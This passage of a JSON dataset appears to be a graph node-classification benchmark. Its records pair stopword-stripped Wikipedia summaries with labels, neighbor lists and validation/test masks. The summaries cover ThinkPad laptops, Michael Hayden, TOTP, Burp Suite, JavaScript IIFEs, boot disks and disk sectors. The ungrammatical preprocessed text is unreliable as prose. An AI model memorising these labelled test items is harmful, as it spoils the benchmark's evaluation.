861 capable supporting optional web camera one first commercially available webcams available laptop units could also record pal ntsc signals onboard composite connectors batteries contained internal processors regulate power usage optimized battery longevity powerpc thinkpads could run windows nt 3.5 4.0 os/2 warp connect powerpc edition aix 4.1.x solaris desktop 2.5.1 powerpc edition many powerpc operating systems corresponding compilers scarce hard find however also possible run certain powerpc versions linux 800 series thinkpad series introduced ibm 1999 geared towards multimedia focus many models featuring independent integrated cd players multimedia access buttons 1400 1500 models designed acer ibm contract featured similar hardware found acer laptops including ali chipsets three way audio jacks internal plastics painted copper paint series thinkpads particularly acer developed models prone broken hinges stress damage chassis one notable thinkpad series lineup s3x s30/s31 models featuring unique keyboard lid design allowing standard size keyboard fit chassis otherwise would n't able support protruding keyboard models largely available asia pacific ibm offered optional piano black lid models designed yamato design lab thinkpad since 701c feature special design accommodate keyboard physically larger laptop also thinkpad aside z61 deviate away standard matte lid a-series developed all-around productivity machine equipped hardware powerful enough make desktop replacement hence biggest heaviest thinkpad series time also features even found t-series age a-series dropped favor g-series r-series a31 released 2002 desktop replacement system equipped pentium 4-m processor clocked 1.6 1.8 1.9 2.0 ghz max supported 2.6 ghz ati mobility radeon 7500 128 256 mb pc2100 ram officially upgradable 1 gb unofficially upgraded 2 gb ibm high rate wireless prism 2.5 based modified support wpa-tkip equipped 20 30 40 gb hard disk drive r series budget line beginning r30 2001 ending r400 r500 presented 2008 successor r400 r500 models thinkpad l series l412 l512 models notable model r50p optional 15 ips lcd screen introduced 2003 g-series consisted three models g40 g41 g50 large heavy machines equipped powerful desktop processors line thinkpads consequently served mainly replacements desktop computers z series released high-end multimedia laptop result first thinkpad feature widescreen 16:10 aspect ratio display z-series also unique certain models featured optional titanium lid integrated wwan webcam also found configurations series ever included z60 z60m z60t z61 z61m z61t z61p latter first z-series thinkpad intel yonah dual core technology processor supports intel vt-x disabled bios turned bios update running fully virtualised operating systems via xen vmware therefore possible despite z61 carrying number t61 hardware z61 closer t60 likewise z60 closer t43 15-year anniversary thinkpad model based x60s laptop model initially known inside lenovo scout name horse ridden tonto sidekick 1950s television series lone ranger lenovo envisioned scout high-end thinkpad would analogous luxury car unit covered fine leather embossed owners initials extensive market research conducted consumers would perceive form factor determined appreciated emphasised warmth nature human relations technology scout soon renamed thinkpad reserve edition came bundled premium services including dedicated 24-hour technical support hotline would answered immediately released 2007 sold 5,000 united states sl series launched 2008 low-end thinkpad targeted mainly geared toward small businesses lacked several traditional thinkpad features thinklight magnesium alloy roll cage ultrabay lid latch use 6-row keyboard different layout traditional 7-row thinkpad keyboard also sl-series models ideapad-based firmware models offered included 14 sl400 sl410 15.6 sl500 sl510 13.3 model sl300 previously offered discontinued w series introduced 2008 replace p-suffixed performance series e.g t61p geared towards cad users photographers power users others need high-performance system demanding tasks w530 released june 2012 minimum specifications include intel core i5 i7 cpu 15.6 hd screen nvidia quadro k1000m graphics processor four dimm slots capable accepting maximum 32 gb ram previously available w7xx series 17 widescreen model w500 15.4 16:10 ratio model w510 15.6 16:9 ratio model w520 15.6 16:9 ratio model w700ds w701ds two displays 17 main lcd 10 slide-out secondary lcd w7xx series also available wacom digitizer built palm rest high-performance workstation models offered high-end components quad core cpus higher-end workstation graphics compared t-series powerful thinkpad laptops available w540 retained thinklight ultrabay roll cage lid latch found t-series w540 release marked end lid latch thinklight hot-swappable ultrabays found earlier models thinkpad w series discontinued replaced p series mobile workstations edge series released early 2010 small business consumer-end machines design radical departure compared traditional black boxy thinkpad design glossy surfaces optional matte finish later models rounded corners silver trim also offered red first traditionally black thinkpads like sl series targeted towards small businesses consumers lack roll cage ultrabay lid latch thinklight traditional thinkpads though 2011 e220s e420s thinklights also introduced island-style keyboard significantly different layout models included 12.5 e220 e220s 13.3 edge 13 14 edge 14 e420 e420s 15.6 edge 15 e520 e545 sizes 11.6 edge 11 model offered available united states series positioned mid-range thinkpad offering containing ultrabooks derived edge series august 2013 series includes s531 s440 models cases made aluminum magnesium alloy available silver gunmetal colors lenovo thinkpad twist s230u laptop/tablet computer hybrid aimed high-end users twist gets name screen ability twist manner converts device tablet twist 12.5 screen makes use intel core i7 processor ssd technology lieu hard drive review engadget dana wollman wrote lately feel like reviews windows 8 convertibles end way thinkpad twist plenty going bright ips display good port selection affordable price unrivaled typing experience like thinkpads past also offers useful software features businesses lacking dedicated departments good things road warrior battery barely lasts four hours something tells us twist still appeal lenovo loyalists folks trust thinkpad build quality would n't caught dead using keyboard 're brand-agnostic though windows 8 convertibles comfortable keyboards – mention sharper screens faster performance longer battery life helix convertible laptop satisfying tablet conventional notebook users uses rip flip design allows user detach display replace facing different direction sports 11.6 full hd 1920 × 1080 display support windows 8 multi-touch essential processing hardware contained display assembly multitouch capability detached monitor used standalone tablet computer helix high-end hardware build quality including gorilla glass stylus-based input intel vpro hardware-based security features designed appeal business users review published forbes jason evangelho wrote first laptop owned thinkpad t20 next one may likely thinkpad helix lenovo unveiled ces 2013 sea touch-inspired windows 8 hardware first ultrabook convertible form factor gets everything right first batch windows 8 ultrabooks get high marks inspired designs n't quite flexible enough truly byod bring device solutions lenovo ideapad yoga came close sensation feeling keyboard underneath fingers transformed tablet mode slightly jarring dell xps 12 solved problem clever rotating hinge design wanted ability remove tablet display entirely products thinkpad 13 also known thinkpad s2 mainland china budget model 13-inch screen versions running windows 10 google chrome os options powerful configuration skylake core i7 processor 512gb ssd connectivity includes hdmi usb 3.0 onelink+ usb type-c etc weighs thick 2017 second generation ultrabook model released kaby lake core i7 processor fhd touchscreen available certain countries lineup merged l-series 2018 l380 successor 13 second generation lenovo released 25th anniversary retro thinkpad 25 october 2017 model based t470 difference 7-row classic keyboard layout found −20 series logo received splash colour reminiscent ibm era last thinkpad models 7-row keyboard introduced 2011 september 2017 lenovo announced two thinkpad models featuring amd pro chipset technology – a275 a475 sees revival series nameplate seen since early 2000s thinkpads ibm ownership however likely moniker emphasised uses amd technology rather comparative product segment workstation class previous line n't first time lenovo offered amd derived thinkpad first released alternative premium offering established series x series thinkpads use intel chipsets instead",
    "neighbors": [
      8578,
      6148,
      6153,
      271,
      8976,
      4244,
      3605,
      9498,
      4641,
      1186,
      4259,
      10658,
      1832,
      11438,
      7983,
      5681,
      5939,
      823,
      3514,
      7354,
      8900,
      4816,
      1874,
      4306,
      4565,
      10838,
      10972,
      1380,
      5606,
      11623,
      3304,
      5481,
      6129,
      499,
      5235,
      2165,
      1400,
      3323,
      8700
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3305,
    "label": 4,
    "text": "Michael_Hayden_(general):michael hayden general michael vincent hayden born march 17 1945 retired united states air force four-star general former director national security agency principal deputy director national intelligence director central intelligence agency hayden currently co-chairs bipartisan policy center electric grid cyber security initiative 2017 hayden became national security analyst cnn director national security agency nsa 1999 2005 tenure director oversaw controversial nsa surveillance technological communications persons united states alleged foreign terrorist groups resulted nsa warrantless surveillance controversy april 21 2005 lt. gen hayden confirmed united states senate first principal deputy director national intelligence awarded fourth star-making highest-ranking military intelligence officer armed forces served position dni john negroponte may 26 2006 may 8 2006 hayden nominated position director central intelligence agency following resignation porter j. goss 23 may united states senate select committee intelligence voted 12–3 send nomination senate floor nomination confirmed united states senate 26 may vote 78–15 may 30 2006 following day cia lobby president george w. bush attendance hayden sworn director central intelligence agency july 1 2008 hayden retired air force 41 years service continued serve director cia february 12 2009 received honorary doctorate institute world politics washington d.c. 2009 currently principal chertoff group security consultancy co-founded former homeland security secretary michael chertoff also serves board directors caliburn international military contractor oversees operations homestead temporary shelter unaccompanied children hayden distinguished visiting professor george mason university schar school policy government elected board directors motorola solutions effective january 4 2011 michael vincent hayden born march 17 1945 pittsburgh pennsylvania irish-american couple sadie murray harry v. hayden jr. worked welder pennsylvania manufacturing company sister debby brother harry hayden attended st. peter elementary school 7th 8th grade played quarterback school football team coached late dan rooney son founder pittsburgh steelers former chairman team hayden graduated north catholic high school one first jobs equipment manager steelers went duquesne university pittsburgh earned bachelor arts history 1967 commissioned second lieutenant attended graduate school duquesne master degree modern american history continues avid fan hometown pittsburgh steelers since 1990s traveling wife family least three four games year hayden commissioned duquesne university air force reserve officers training corps program hayden entered active military service 1969 hayden married former jeanine carrier daughter margaret two sons michael liam november 2018 hayden hospitalized suffering stroke hayden served commander air intelligence agency director joint command control warfare center headquartered lackland air force base also served senior staff positions pentagon headquarters u.s. european command stuttgart germany national security council washington d.c. u.s. embassy then-people republic bulgaria prior becoming director national security agency general served deputy chief staff united nations command u.s forces korea yongsan garrison also worked intelligence guam 1996 1997 hayden served commander aia agency 16,000 charged defending exploiting information domain hayden served director national security agency chief central security service fort george g. meade maryland march 1999 april 2005 director nsa chief css responsible combat support agency department defense military civilian personnel stationed worldwide hayden came nsa time great trouble agency internal government analysis indicated suffered lack quality management outdated infrastructure fact soon came board huge part nsa network system crashed several days part plan revitalize agency introduce outside contractors induce lot old managers retire get rid old management structures part plan also included increased openness agency historically one secretive organs government notably allowed james bamford access book body secrets hayden also initially extremely concerned following laws domestic surveillance many reports say 9/11 became concerned stopping terrorism allegedly softened stance domestic surveillance hayden however said believed everything agency effective appropriate lawful 9/11 hayden immediately evacuated non-essential personnel nsa headquarters 9/11 agency greatly increased activity details operations largely hidden played major role wars afghanistan iraq war terror one notable example relationship unmanned aerial vehicle 'drone program may 2006 usa today reported hayden leadership nsa created domestic telephone call database nomination hearings hayden defended actions senator russ feingold others stating relied upon legal advice white house building database supported article two united states constitution executive branch powers president must take care laws faithfully executed overriding legislative branch statutes forbidding warrantless surveillance domestic calls included foreign intelligence surveillance act fisa previously action would required warrant fisa court stated purpose database eavesdrop international communications persons within u.s. individuals groups overseas order locate terrorists hayden also championed trailblazer project transformation project large information technology component project criticized several nsa staffers including privacy protections united states citizens waste money critics included diane roark house intelligence committee nsa workers thomas andrews drake william binney j. kirk wiebe loomis others hayden severely rebuked critics several quit protest investigations nsa inspector general dod inspector general congress trailblazer shut part intelligence reform terrorism prevention act 2004 cia chief longer would run intelligence community instead new office created purpose director national intelligence general hayden became principal deputy director national intelligence may 2005 may 2006 first dni john negroponte january 23 2006 hayden participated news conference youtube video posted michael hayden telling reporters press conference probable cause required searches seizures fourth amendment claiming instead standard whether search seizure reasonable probable cause required warrants whether search seizure deemed unreasonable hayden referred people believed torture cia detainees never yielded useful intelligence interrogation deniers may 8 2006 hayden nominated president george w. bush director central intelligence agency resignation porter j. goss may 5 2006 later confirmed may 26 2006 director 78–15 full u.s. senate vote critics nomination hayden attempts increase domestic surveillance included senator dianne feinstein stated may 11 2006 happen believe way major constitutional confrontation fourth amendment guarantees unreasonable search seizure hayden accused lying congress 2007 testimony cia 'enhanced interrogation program 2007 hayden lobbied allow cia conduct drone strikes purely behavior ground vehicles evidence connection terrorism 2008 hayden warned destabilizing consequences muslim migration europe might raise possibility civil unrest 2013 p5+1 reached nuclear agreement iran hayden said accepted iranian uranium enrichment 2014 senate intelligence committee report cia torture cited email prepared subordinate indicated cia director hayden instructed out-of-date information used briefing congress fewer 100 guantanamo bay detainees would reported september 2013 hayden stressed indisputable legality nsa called edward snowden troubled young man morally arrogant tremendous degree also said prospects russia suspect end like rest defectors went old soviet union isolated bored lonely depressed—and ended alcoholics 2008 native northside neighborhood city pittsburgh named part street going past heinz field honor july 26 2011 hayden inducted air force reserve officer training corps distinguished alumni ceremony maxwell afb alabama officiated lt. gen. allen g. peck commander air university serves member board advisors military cyber professionals association mcpa playing edge one new york times book review 100 notable books 2016",
    "neighbors": [
      6017,
      3843,
      1930,
      8726,
      8356,
      1189,
      3495,
      297,
      9517,
      1838,
      5308,
      10305,
      1986,
      6343,
      6344,
      11335,
      7119,
      208,
      7759,
      3154,
      7887,
      8276,
      7893,
      9688,
      991,
      7137,
      7145,
      2419,
      6005,
      6136,
      766
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3306,
    "label": 4,
    "text": "Estonian_Defence_League's_Cyber_Unit:estonian defence league cyber unit estonian defence league ’ cyber unit kkl group units within certain malevs estonian defense league established 2010 created inspiration 2007 cyberattacks estonia spearheaded informatics scientist ülo jaaksoo focuses defense estonian state private telecommunications infrastructure outside-derived cyberattacks mostly employs volunteer participation professionals kkl headquartered grounds tartu tallinn malevs jointly headed tallinn jaan priisalu tartu kuido külm kkl mission protect estonia high-tech way life protecting information infrastructure thus carrying broad defense goals defence minister jaak aaviksoo publicly suggested desire spread kkl units branches option conscripted estonian military",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 3307,
    "label": 3,
    "text": "Zaxxon:zaxxon zaxxon first game employ axonometric projection lent name game axxon axon ometric projection type axonometric projection isometric projection effect simulates three dimensions third-person viewpoint also first arcade game advertised television commercial produced paramount pictures 150,000 world record zaxxon 4,680,740 points scored vernon kalanikaus lā'ie hawai march 15 1982 according twin galaxies intergalactic scoreboard object game hit many targets possible without shot running fuel—which replenished paradoxically blowing fuel drums 300 points blowing satellites gun turrets score 200 500 1,000 points two fortresses fly outer space segment end second fortress boss form zaxxon robot destroying robot rocket six hits firing scores 1,000 otherwise 200 surviving ordeal outer space scene destroying 20 ships scores 1,000 points player ship casts shadow indicate height altimeter also displayed space nothing ship cast shadow walls entrance exit fortress openings ship must right altitude pass within fortress additional walls ship shadow altimeter aid flying successfully extra ship awarded usually 10,000 points thereafter lives 19 levels completed give appear lower right corner screen 1982 1985 zaxxon ported apple ii atari 8-bit family atari 2600 atari 5200 msx zx spectrum commodore 64 dragon 32 colecovision intellivision ibm pc compatibles sega sg-1000 trs-80 color computer trs-80 atari 2600 intellivision ports noticeably different used 3rd-person behind-the-ship 3d perspective instead isometric graphics versions colecovision version programmed coleco staffer lawrence schick first home version use isometric graphics 1983 coleco released table top version zaxxon double-panel vfd screen bandai released 2 zaxxon handhelds one vfd table top european japanese market lcd card game sold worldwide video games 1983 called colecovision version zaxxon coup new system video magazine also praised colecovision version arcade alley column describing one thrilling games available noting passing serious criticism arcade original many players felt needed flying lessons even ghost chance performing well k-power rated color computer version 8 points 10 magazine praised excellent three-dimensional graphics concluded zaxxon game ca n't praised enough softline 1983 called atari 8-bit version superb three-dimensional computer game ... since choplifter game looked impressive magazine also liked graphics apple ii trs-80 versions despite computers hardware limitations predicted zaxxon would long-lived bestseller 1984 magazine readers named game fifth most-popular apple program worst apple program third-worst atari program 1983 ii computing listed zaxxon fourth list top apple ii games late 1985 based sales market-share data 2006 zaxxon games included bonuses sega genesis collection sony playstation 2 psp consoles original zaxxon game included ps2 super zaxxon one available psp zaxxon also included unlockable arcade game sonic ultimate genesis collection xbox 360 playstation 3 arcade version released wii virtual console japan december 15 2009 pal region march 5 2010 north america april 12 2010 zaxxon spawned arcade sequel super zaxxon color scheme different player ship flies faster making game difficult robot end second fortress replaced dragon well original future spy released sega 1984 uses hardware zaxxon similar gameplay realistic military theme 1982 milton bradley made zaxxon board game 1987 zaxxon 3-d released master system console variation made use 3-d glasses add-on extra depth perception atari 2600 intellivision ports forward-scrolling rather isometric october 1993 atari corporation filed lawsuit sega alleged infringement patent originally created atari corp. 1980s former seeking preliminary injunction stop manufacturing usage sales hardware software sega genesis game gear september 28 1994 parties reached settlement involved cross-licensing agreement publish five titles year across systems 2001 zaxxon 3-d one first five titles approved deal sega order converted atari jaguar never released zaxxon motherbase 2000 released sega 32x 1995 first zaxxon game incorporate polygon graphics game bore zaxxon brand united states japanese version named parasquad european version named motherbase u.s. gaming critics generally remarked game similar enough zaxxon justify use brand zaxxon escape released october 4 2012 ios android devices game criticized little resemblance original bootleg released arcades 1982 called jackson unauthorized adaptations game published ti 99/4a arcturus amstrad cpc zaxx bbc micro fortress 1984 trs-80 color computer zakssund 1983 hostile terrain encounter h.a.t.e zaxxon clone developed vortex software several 8-bit 16-bit computers published gremlin graphics 1989 2012 zaxxon shown art video games exhibition smithsonian home video game console port zaxxon shown music video new order track blue monday character tommy jarvis played corey feldman paramount feature film seen playing zaxxon character introduction zaxxon featured plot device 1986 independent feature film hollywood zap zaxxon seen numerous times video gamed-themed storyline show remington steele episode steele waters run deep npr podcast pop culture happy hour holds hosts zaxxon rule wherein forbidden bring topics unrelatable audience events one personal life season 1 episode alley abc sitcom home improvement randy plays zaxxon bowling alley attempting set record bully tries stop playing",
    "neighbors": [
      8937,
      4716,
      5260,
      8300,
      9006,
      1776,
      6129,
      10316,
      5011,
      10544,
      10931,
      919,
      11448,
      921,
      986,
      5820,
      11231
    ],
    "mask": "None"
  },
  {
    "node_id": 3308,
    "label": 2,
    "text": "Microsoft_Tinker:microsoft tinker tinker also known microsoft tinker puzzle video game developed fuel industries player controls robot various mazes obstacle courses originally released september 23 2008 part windows ultimate extras contained 60 levels including 20-level tutorial free map editor level builder also released however compatible games windows – live version tinker compatible windows ultimate extras version december 15 2009 expanded live-enabled version game released games windows – live client game available windows xp windows vista windows 7 including users access windows vista ultimate extras windows vista editions contains 160 levels including tutorial version also 15 achievements worth 200g similar many xbox live arcade games like every games windows live game requires user sign using gamertag assigned windows live id however windows vista ultimate extras version requirement tinker spatial/environmental puzzle game players must guide robot end point moving objects activating switches traversing obstacles playing field square board divided checkerboard pattern robot given limited number moves make runs energy player must guide goal marker without expiring motions essentially action robot makes counts move including taking step activating switch turning around players must carefully plan actions stage waste moves players replenish robot energy collecting batteries thus extend possible number moves allowed make players earn achievement star level completing course par time energy cog collection cogs exist level obstacles objects present levels include movable objects pushed pulled two objects row pushed even movable objects stacked top pushed bottom object movable e.g. tower consisting two dice blocks metal block moved one dice blocks bottom attempting push immovable object row objects result wasted move though attempting walk obstacle waste move robot destroyed rendered inoperable hit laser beam falling height greater two blocks running energy hazards destroy robot process reaching exit e.g. robot walks laser beam crosses exit square hazard trumps exit robot destroyed however level completed exit reached zero energy live-enabled version tinker previously possible earn achievement star set 07 level 19 due energy par value -1 player could unlock perfection achieved achievement thus able obtain 175 achievement points 200 fuel industries game developer nick iannitti mentioned tinker blog fix sent gfwl march 7 2010 fix hours removed due bug auto-update code required unnecessary reboot update officially released april 10 2010 making perfection achieved achievement obtainable",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      8798,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 3309,
    "label": 5,
    "text": "Time-based_One-time_Password_algorithm:time-based one-time password algorithm time-based one-time password algorithm totp extension hmac-based one-time password algorithm hotp generating one-time password instead taking uniqueness current time adopted internet engineering task force standard rfc 6238 cornerstone initiative open authentication oath used number two-factor authentication systems latency network human unsynchronised clocks one-time password must validate range times authenticator authenticated time downsampled larger durations e.g. 30 seconds allow validity parties however hotp decreased uniqueness requires additional countermeasures rate limiting establish totp authentication authenticated authenticator must pre-establish hotp parameters following totp parameters authenticator authenticatee compute totpvalue authenticator checks totpvalue supplied authenticated matches locally-generated totpvalue authenticators allow values generated current time order account slight clock skews network latency user delays totp uses hotp algorithm substituting counter non-decreasing value based current time time counter c integer counting number durations difference current unix time epoch cf unix epoch latter values integer seconds note unix time strictly increasing specifically leap seconds inserted utc subsequent authentications work clocks authenticated authenticator need roughly synchronized authenticator typically accept one-time passwords generated timestamps differ ±1 time interval authenticated timestamp totpvalues phished passwords though require attackers proxy credentials real time rather collect later time implementations n't limit login attempts vulnerable brute forcing values attacker steals shared secret generate new valid totpvalues particular problem attacker breaches large authentication database totp devices batteries go flat clocks de-sync totp software versions run phones lost and/or stolen real-world implementations methods bypass protection e.g printed codes email-resets etc. cause considerable support burden large user-bases also gives fraudulent users additional vectors exploit totpvalues valid longer amount time show screen typically twice long concession authenticating authenticated sides clocks skewed large margin totp draft developed collaboration several oath members order create industry-backed standard complements event-based one-time standard hotp offers end user organizations enterprises choice selecting technologies best fit application requirements security guidelines 2008 oath submitted draft version specification ietf version incorporates feedback commentary authors received technical community based prior versions submitted ietf may 2011 totp officially became rfc 6238",
    "neighbors": [
      8260,
      3590,
      10566,
      11244,
      10961,
      5077,
      7958,
      5373,
      4575
    ],
    "mask": "Test"
  },
  {
    "node_id": 3310,
    "label": 4,
    "text": "Burp_Suite:burp suite burp burp suite graphical tool testing web application security tool written java developed portswigger web security tool three editions community edition downloaded free charge professional edition enterprise edition purchased trial period community edition significantly reduced functionality developed provide comprehensive solution web application security checks addition basic functionality proxy server scanner intruder tool also contains advanced options spider repeater decoder comparer extender sequencer company behind burp suite also developed mobile application containing similar tools compatible ios 8 portswigger founded 2004 dafydd stuttard leading expert web security also authored popular manual web application security",
    "neighbors": [
      5677,
      461,
      3604,
      4725,
      3290,
      7228
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3311,
    "label": 1,
    "text": "Corpus_of_Electronic_Texts:corpus electronic texts corpus electronic texts celt online database contemporary historical documents relating irish history culture 8 december 2016 celt contained 1,601 documents total 18 million words 1992 celt originated ashes unsuccessful partnership university college cork ucc/nui royal irish academy ria project named curia according celt database caters academic scholars teachers students general public world",
    "neighbors": [
      2901,
      3311
    ],
    "mask": "None"
  },
  {
    "node_id": 3312,
    "label": 6,
    "text": "Be_File_System:file system file system bfs native file system beos linux kernel referred befs avoid confusion boot file system bfs developed dominic giampaolo cyril meurillon ten-month period starting september 1996 provide beos modern 64-bit capable journaling file system case-sensitive capable used floppy hard disks read-only media cd-roms however use small removable media advised file-system headers consume 600 kb 2 mb rendering floppy disks virtually useless like predecessor ofs old file system written benoit schillings formerly bfs includes support extended file attributes metadata indexing querying characteristics provide functionality similar relational database whilst intended 64-bit-capable file system size on-disk structures mean practical size limit approximately 2 exabytes similarly extent-based file allocation reduces maximum practical file size approximately 260 gigabytes best little blocks pathological worst case depending degree fragmentation design process application programming interface internal workings part documented book practical file system design file system addition original 1996 bfs used beos several implementations linux early 1999 makoto kato developed file system driver linux however driver never reached complete stable state 2001 dyson developed version linux bfs driver 2002 axel dörfler developers created released reimplemented bfs called openbfs haiku openbeos back january 2004 robert szeleney announced developed fork openbfs file system use skyos operating system regular openbfs implementation also ported syllable included since version 0.6.5",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      3631,
      4665,
      7225,
      11323,
      8772,
      9286,
      1109,
      6236,
      10851,
      4708,
      8298,
      9836,
      7789,
      9333,
      6263,
      9335,
      2687,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      4804,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      823,
      6970,
      1339,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      1374,
      10596,
      2407,
      10087,
      370,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      11184,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 3313,
    "label": 9,
    "text": "Immediately_invoked_function_expression:immediately invoked function expression immediately invoked function expression iife pronounced iffy javascript programming language idiom produces lexical scope using javascript function scoping immediately invoked function expressions used avoid variable hoisting within blocks protect polluting global environment simultaneously allow public access methods retaining privacy variables defined within function immediately invoked function expressions may written number different ways common convention enclose function expressionand optionally invocation operatorwith grouping operator parentheses tell parser explicitly expect expression otherwise situations parser encounters codice_1 keyword treats function declaration statement function expression function /* ... */ function /* ... */ ways enforce function expression function /* ... */ ~function /* ... */ -function /* ... */ +function /* ... */ void function /* ... */ contexts expression expected wrapping parentheses necessary var f function /* ... */ true function /* ... */ 0 function /* ... */ passing variables scope done follows function b /* ... */ hello world initial parenthesis one case automatic semicolon insertion asi javascript cause problems expression instead interpreted call last term preceding line styles omit optional semicolons semicolon placed front parenthesis known defensive semicolon example b c // code ... avoid parsed codice_2 key understanding design patterns iife realize prior es6 javascript featured function scope thus lacking block scope passing values reference inside closures longer case es6 version javascript implements block scoping using new codice_3 codice_4 keywords lack block scope means variables defined inside example loop definition hoisted top enclosing function evaluating function depends variables modified outer function including iteration difficult see without loop update value defining invoking function var v getvalue v 1 getvalue function return v v 2 getvalue // 2 result may seem obvious updating codice_5 manually produce unintended results codice_6 defined inside loop hereafter function passes codice_5 argument invoked immediately preserving inner function execution context var v getvalue v 1 getvalue function x v v 2 getvalue // 1 equivalent following code var v getvalue v 1 function f x getvalue f v v 2 getvalue // 1 david herman effective javascript contains example illustrating problems evaluation context inside loops herman example deliberately convoluted arises directly lack block scope iifes also useful establishing private methods accessible functions still exposing properties later use following example comes alman post iifes // counter function returns object properties case functions var counter function // calls access function properties returned counter counter.get // 0 counter.set 3 counter.increment // 4 counter.increment // 5 attempt access codice_8 global environment undefined enclosed within invoked function property codice_9 likewise attempt access codice_10 result error declared codice_10 global environment originally known self-executing anonymous function ben alman later introduced current term iife semantically accurate name idiom shortly discussion arose comp.lang.javascript notably immediately invoked functions need anonymous inherently ecmascript5 strict mode forbids codice_12 rendering original term misnomer",
    "neighbors": [
      1152,
      8289,
      803,
      5635,
      3462,
      10510,
      10991,
      8854
    ],
    "mask": "Test"
  },
  {
    "node_id": 3314,
    "label": 2,
    "text": "Boot_disk:boot disk boot disk removable digital data storage medium computer load run boot operating system utility program computer must built-in program load execute program boot disk meeting certain standards almost modern computers boot hard drive containing operating system software would normally called boot disks removable media cd-roms common forms media used media magnetic paper tape drives zip drives recently usb flash drives used computer bios must support booting device question boot disks used term boot comes idea lifting oneself one bootstraps computer contains tiny program bootstrap loader load run program found boot device program may small program designed load larger capable program i.e. full operating system enable booting without requirement either mass storage device write boot medium usual boot program use system ram ram disk temporary file storage example computer compatible ibm pc able built-in software load contents first 512 bytes floppy execute viable program boot floppies simple loader program bytes process vulnerable abuse data floppies could virus written first sector silently infects host computer switched disk drive bootable floppy disks boot floppies pcs usually contain dos miniature versions linux commonly available floppy disk hold 1.4 mb data standard format making impractical loading large operating systems use boot floppies decline due availability higher-capacity options cd-roms usb flash drives modern pc configured attempt boot various devices certain order computer booting device desired floppy drive user may enter bios setup function pressing special key computer first turned delete f1 f2 f10 f12 changing boot order recent bioses permit interruption final stage boot process pressing function key usually f11 results list bootable devices presented selection may made modern apple computers boot appropriate disk user presses c key machine starting different operating systems use different boot disk contents boot disks must compatible computer designed files must version operating system complete boot disks prepared one operation installed operating system details vary",
    "neighbors": [
      1408,
      2432,
      516,
      1801,
      2196,
      8857,
      4637,
      7983,
      5425,
      3382,
      823,
      9910,
      954,
      2107,
      831,
      5596,
      6494,
      4581,
      1515,
      6768,
      6393,
      2811,
      1150,
      639
    ],
    "mask": "Test"
  },
  {
    "node_id": 3315,
    "label": 6,
    "text": "Disk_sector:disk sector computer disk storage sector subdivision track magnetic disk optical disc sector stores fixed amount user-accessible data traditionally 512 bytes hard disk drives hdds 2048 bytes cd-roms dvd-roms newer hdds use 4096-byte 4 kib sectors known advanced format af sector minimum storage unit hard drive disk partitioning schemes designed files occupy integral number sectors regardless file actual size files fill whole sector remainder last sector filled zeroes practice operating systems typically operate blocks data may span multiple sectors geometrically word sector means portion disk center two radii corresponding arc see figure 1 item b shaped like slice pie thus disk sector figure 1 item c refers intersection track geometrical sector modern disk drives physical sector made two basic parts sector header area typically called id data area sector header contains information used drive controller information includes sync bytes address identification flaw flag error detection correction information header may also include alternate address used data area undependable address identification used ensure mechanics drive positioned read/write head correct location data area contains sync bytes user data error-correcting code ecc used check possibly correct errors may introduced data first disk drive 1957 ibm 350 disk storage ten 100 character sectors per track character six bits included parity bit number sectors per track identical recording surfaces recorded identifier field id associated sector 1961 ibm 1301 disk storage introduced variable length sectors termed records ibm added record record address field separate data record sector modern disk drives sector address fields called id fields separate data sector also 1961 bryant 4000 series introduced concept zoned recording allowed number sectors per track vary function track diameter sectors outer track inner track became industry practice 1990s standard today disk drives announced ibm system/360 1964 detected errors fields sectors records cyclic redundancy check crc replacing parity per character detection prior generations ibm sectors records time added third field physical sector key field aid searching data ibm physical sectors called records three basic parts count field acts id field key field present disk drive sectors data field frequently called ckd format record 1970 ibm 3330 disk storage replaced crc data field sector error correcting code ecc improve data integrity detecting errors allowing correction many errors ultimately fields disk sectors eccs prior 1980s little standardization sector sizes disk drives maximum number bits per track various system manufacturers subdivided track different sector sizes suit oses applications popularity pc beginning 1980s advent ide interface late 1980s led 512-byte sector becoming industry standard sector size hdds similar 